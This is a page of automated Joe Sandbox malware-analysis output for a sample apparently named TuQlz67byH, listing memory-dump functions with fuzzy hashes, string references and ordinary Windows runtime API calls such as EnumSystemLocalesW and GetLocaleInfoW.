Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: 0$ji!^
API String ID: 0-2452136210
Opcode ID: c334d12d3ceb948ea4bf6cbff0d64099af32e41953097943e9040ca50387c667
Instruction ID: f5dc291be0fcb1d2bf7ae1e58999a017e610305258e71f73267c9209c8772826
Opcode Fuzzy Hash: c334d12d3ceb948ea4bf6cbff0d64099af32e41953097943e9040ca50387c667
Instruction Fuzzy Hash: 92C1AF705006498FCB24CF68C681FBABBB1AB45318F346A5DD45EB7291C732AD47CB51

Function 00F0CEB7 Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

BaBc, xrefs: 00F0D06F
Ye[g, xrefs: 00F0CFCE

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: BaBc$Ye[g
API String ID: 0-286865133
Opcode ID: f1f7f391700c1d153706023ea2e533e08aec07d0302d054125fe460e923244f9
Instruction ID: cc7d45eeedc1013a1272a2ef546df557e29d80b79ea30fdb8331a1fd19859ba5
Opcode Fuzzy Hash: f1f7f391700c1d153706023ea2e533e08aec07d0302d054125fe460e923244f9
Instruction Fuzzy Hash: C051DFB1A083818BD730CF15C480BABB7E1FF96360F084A1DE4D99B690E3749844EB97

Function 00F20F18 Relevance: 2.6, Strings: 2, Instructions: 128COMMON

Download Yara Rule

Strings

%*+(, xrefs: 00F20FC7
40F9, xrefs: 00F20F21

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: %*+($40F9
API String ID: 0-4141425864
Opcode ID: e36d9df26ce8d8e7db79f00bc2036a7f7c8980a0d99b81a382e9f2e5388ff683
Instruction ID: 229ed4ad070e987250a3346a437781a252ff02b2bc40998639e71267ca0cfa1c
Opcode Fuzzy Hash: e36d9df26ce8d8e7db79f00bc2036a7f7c8980a0d99b81a382e9f2e5388ff683
Instruction Fuzzy Hash: 9141BC70511B818BD7358F24E690B26BBF2FF12304F64944DE4C29BA92C736F806DB24

Function 00EEDED8 Relevance: 2.5, Strings: 1, Instructions: 1295COMMON

Download Yara Rule

Strings

@, xrefs: 00EEFB18

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: b9ab761e06cb60054b554ba1fd181e1af7336824aa7e9b9d9034564fed5e9b5a
Instruction ID: ce9b6a72e92ec87138f60f1cf3e1cd90d4805a536c908e00f4deed93017053d6
Opcode Fuzzy Hash: b9ab761e06cb60054b554ba1fd181e1af7336824aa7e9b9d9034564fed5e9b5a
Instruction Fuzzy Hash: 7F9202316083858FD718CE29C89037ABBE2AFC5318F18962DE999E7392D735DD45CB81

Function 00ED572C Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00ED5727,?,?,00000008,?,?,00EE15F5,00000000), ref: 00ED5959

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 14efc9bb629b25864de14cd1b91916394a1430c3719440b545bb353bfc7faa46
Instruction ID: ae7d386ef3d99ff3a65bfaf9bc6b27190e62f630c5420e915d9a4919eb79f0a9
Opcode Fuzzy Hash: 14efc9bb629b25864de14cd1b91916394a1430c3719440b545bb353bfc7faa46
Instruction Fuzzy Hash: DEB15E36610A04CFD719CF28C496BA47BE0FF45368F25965AE899DF3A1C335E982CB40

Function 00EC729C Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00EC72B2

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 12beac984ce485e207db6e656a2408da93bd5dab6c17aee52e9f964da9caa41d
Instruction ID: af18d156fc0a61329c122d52cfe9aa13edaa2a7f7b8b3b68d05d37e7bb5be1a2
Opcode Fuzzy Hash: 12beac984ce485e207db6e656a2408da93bd5dab6c17aee52e9f964da9caa41d
Instruction Fuzzy Hash: B1A16C719182498FDB18CF69DDC1799BBB1FB88324F18912EE859FB2A0C3359946CF50

Function 00F1E1A8 Relevance: 1.7, Strings: 1, Instructions: 484COMMON

Download Yara Rule

Strings

", xrefs: 00F1E4A9

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 1e36e4a90a5bcd9904d9a2755a98640d2f51fe7f53356f7c076c40d918f289ea
Instruction ID: edcd693fee77805db48f39122df788968982f050f6593fc64cbefb41b0e24481
Opcode Fuzzy Hash: 1e36e4a90a5bcd9904d9a2755a98640d2f51fe7f53356f7c076c40d918f289ea
Instruction Fuzzy Hash: C9F14771E083515FD728CE24C8507ABBBE6AFD5320F08856DEC9987382D634DD85E792

Function 00F14D38 Relevance: 1.7, Strings: 1, Instructions: 425COMMON

Download Yara Rule

Strings

%*+(, xrefs: 00F1513B, 00F15143

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: %*+(
API String ID: 0-3233224373
Opcode ID: ccee2a807569c25fde004874fc692891e8030e5aaea5b8ac7fbb6ff0169ecf93
Instruction ID: 4f0b1dd1693fd1934c45155929ad75b7bfa563c7011ebd16d690cd76d3e8123e
Opcode Fuzzy Hash: ccee2a807569c25fde004874fc692891e8030e5aaea5b8ac7fbb6ff0169ecf93
Instruction Fuzzy Hash: 3CC1A1B1908301EBDB11AB54C841AABB7F5EFD5760F09881CF8C497251E335ED90EBA2

Function 00F20813 Relevance: 1.6, Strings: 1, Instructions: 363COMMON

Download Yara Rule

Strings

Zvt~, xrefs: 00F2081F

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: Zvt~
API String ID: 0-694600945
Opcode ID: a6c653d8a13b2bff62d9e48921e2962895175bf4283dfb7f1703a331fac975e3
Instruction ID: 1c1c92c18da68bedc2d9be2aec75fa6c41fe13bf44b2b0714428b913a61b6236
Opcode Fuzzy Hash: a6c653d8a13b2bff62d9e48921e2962895175bf4283dfb7f1703a331fac975e3
Instruction Fuzzy Hash: BDC1BB705057918FD766CF28D190B26BBE1BF16304F68889DD4DA9BB93CB36E802DB50

Function 00F19BA8 Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

%*+(, xrefs: 00F19C9B, 00F19CA3

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: %*+(
API String ID: 0-3233224373
Opcode ID: f162ee7309057f34a05e18a7188bb59e25b4a99871efe8703988e1fac2c245e9
Instruction ID: 89c1bb2ebc132434f582a188ef2c77b9f7130624ba606151b7251493115eb06f
Opcode Fuzzy Hash: f162ee7309057f34a05e18a7188bb59e25b4a99871efe8703988e1fac2c245e9
Instruction Fuzzy Hash: AFB1E2B1A0C3029BDB14DF14D8A0BABB7E2EF85350F14492CE5C59B251E375D885EBE2

Function 00F34E98 Relevance: 1.6, Strings: 1, Instructions: 331COMMON

Download Yara Rule

Strings

P, xrefs: 00F3503F

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: b4fda1ba9dc91e6581218cfb9f953b2bbd6cc257535fdb74648dd629dc9337cc
Instruction ID: e3a55f03f963a232567062a883805f8920f98f5741d0d43120535db817bfda54
Opcode Fuzzy Hash: b4fda1ba9dc91e6581218cfb9f953b2bbd6cc257535fdb74648dd629dc9337cc
Instruction Fuzzy Hash: 71B1F2729087618FC715CE18D88072EB7E2EBC5B64F158A2CE8A5AB390C775DC05DBD2

Function 00EDBB36 Relevance: 1.6, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

ji!^, xrefs: 00EDBB41, 00EDBE21

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID: ji!^
API String ID: 3471368781-848646596
Opcode ID: ec825f58c03656e5ab77048c7c1cf2e0912df3393ebc4b0219222b07f62bfcb5
Instruction ID: 4790f783b6dd85fc525c8fb5dc972192ee54811e00b72ccef74b5f082311f098
Opcode Fuzzy Hash: ec825f58c03656e5ab77048c7c1cf2e0912df3393ebc4b0219222b07f62bfcb5
Instruction Fuzzy Hash: 62B1D3355007458BCB389B25CC92ABAB3E9FF44308F15552EE982E6780FB75A987CB10

Function 00EDC372 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ED4EB1: GetLastError.KERNEL32(?,00000008,00ED9482), ref: 00ED4EB5
Part of subcall function 00ED4EB1: SetLastError.KERNEL32(00000000,00EEC480,00000024,00ED0419), ref: 00ED4F57

EnumSystemLocalesW.KERNEL32(00EDC498,00000001,00000000,?,-00000050,?,00EDCAC9,00000000,?,?,?,00000055,?), ref: 00EDC3E4

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: e5724a2a974a18716ef7d8a19a11750e924a26b09ee68abcc0268254ec07d011
Instruction ID: e3d8eebe4eb73f0e227d0ed8299cc6500b1ad11898c91c51b5ad3e172f1fdf6b
Opcode Fuzzy Hash: e5724a2a974a18716ef7d8a19a11750e924a26b09ee68abcc0268254ec07d011
Instruction Fuzzy Hash: B71129362003065FDB189F39C8A15BAB7A1FF803A8B24842EE947A7B40D371A943C740

Function 00EDC91A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00ED4EB1: GetLastError.KERNEL32(?,00000008,00ED9482), ref: 00ED4EB5
Part of subcall function 00ED4EB1: SetLastError.KERNEL32(00000000,00EEC480,00000024,00ED0419), ref: 00ED4F57

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00EDC6B4,00000000,00000000,?), ref: 00EDC946

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 3ff3452e4354468ba0e14e5a6797c47eb9d7bd6fdba3fbf8a3a71d6e7421ffef
Instruction ID: bb656152411eee43d66e778d273d5042d90158f891572e4a2503421193335714
Opcode Fuzzy Hash: 3ff3452e4354468ba0e14e5a6797c47eb9d7bd6fdba3fbf8a3a71d6e7421ffef
Instruction Fuzzy Hash: 3DF0F933500113BBDB245A318815BBA77A8EF80798F24442AEC02B7380EA30FE43C590

Function 00EDC40D Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ED4EB1: GetLastError.KERNEL32(?,00000008,00ED9482), ref: 00ED4EB5
Part of subcall function 00ED4EB1: SetLastError.KERNEL32(00000000,00EEC480,00000024,00ED0419), ref: 00ED4F57

EnumSystemLocalesW.KERNEL32(00EDC6EB,00000001,?,?,-00000050,?,00EDCA8D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00EDC457

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 4a8de2f8b49fd99db2263cbcda2901a5760b6d1a3a227ef2c3bd422b82fa9d08
Instruction ID: a7c63b5e5ca999192286e4b1cbb023e63063738ca7cad34ab0fce4daeca9d83f
Opcode Fuzzy Hash: 4a8de2f8b49fd99db2263cbcda2901a5760b6d1a3a227ef2c3bd422b82fa9d08
Instruction Fuzzy Hash: AAF0C2362003056FDB145F79DC91A7ABBA5EB80BACF25842EF9469B790C6B19C43CA50

Function 00EDC327 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ED4EB1: GetLastError.KERNEL32(?,00000008,00ED9482), ref: 00ED4EB5
Part of subcall function 00ED4EB1: SetLastError.KERNEL32(00000000,00EEC480,00000024,00ED0419), ref: 00ED4F57

EnumSystemLocalesW.KERNEL32(00EDC280,00000001,?,?,?,00EDCAEB,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EDC35E

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 636440a8010ebb331a1a6a09eb476caddb275a1b292437c03194ad13400ba789
Instruction ID: ea4ad7676d5e1df6276eb1049c2beda090b1021fd49691ccb6f4afd7d1212a11
Opcode Fuzzy Hash: 636440a8010ebb331a1a6a09eb476caddb275a1b292437c03194ad13400ba789
Instruction Fuzzy Hash: C2F0E53630020667CB149F75D84566ABF94EFC1BA4B16409AEE099F790C6729947C790

Function 00EEE272 Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

@, xrefs: 00EEE78E

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 33c5a5b9aaa3ad7d40147cb7931ce02fe19695e2396a5ce853ba19e0c001f1db
Instruction ID: 888bf28551d9071a60a2c4d7e4a6100626284736ea319c413deeea43b85cf249
Opcode Fuzzy Hash: 33c5a5b9aaa3ad7d40147cb7931ce02fe19695e2396a5ce853ba19e0c001f1db
Instruction Fuzzy Hash: 05A1B07160C7858FC718CF19C49476ABBE1AFC9308F189A6DE4D9A7391D774D908CB82

Function 00EF7728 Relevance: 1.5, Strings: 1, Instructions: 271COMMON

Download Yara Rule

Strings

,, xrefs: 00EF789B

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 6a3fef2072c4110c7e08f213014c8aa891b97c95317c3c670d38149bab24221c
Instruction ID: 6d007dc82775605f60dc092f53089ffd38a2e26415bb70662c4e6d153f607837
Opcode Fuzzy Hash: 6a3fef2072c4110c7e08f213014c8aa891b97c95317c3c670d38149bab24221c
Instruction Fuzzy Hash: 80B1397010C3859FC324DF68C88066BBBE0AFA9704F448D6DF5D997382D671EA18CB96

Function 00EC7AAF Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007ABB,00EC6DC9), ref: 00EC7AB4

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

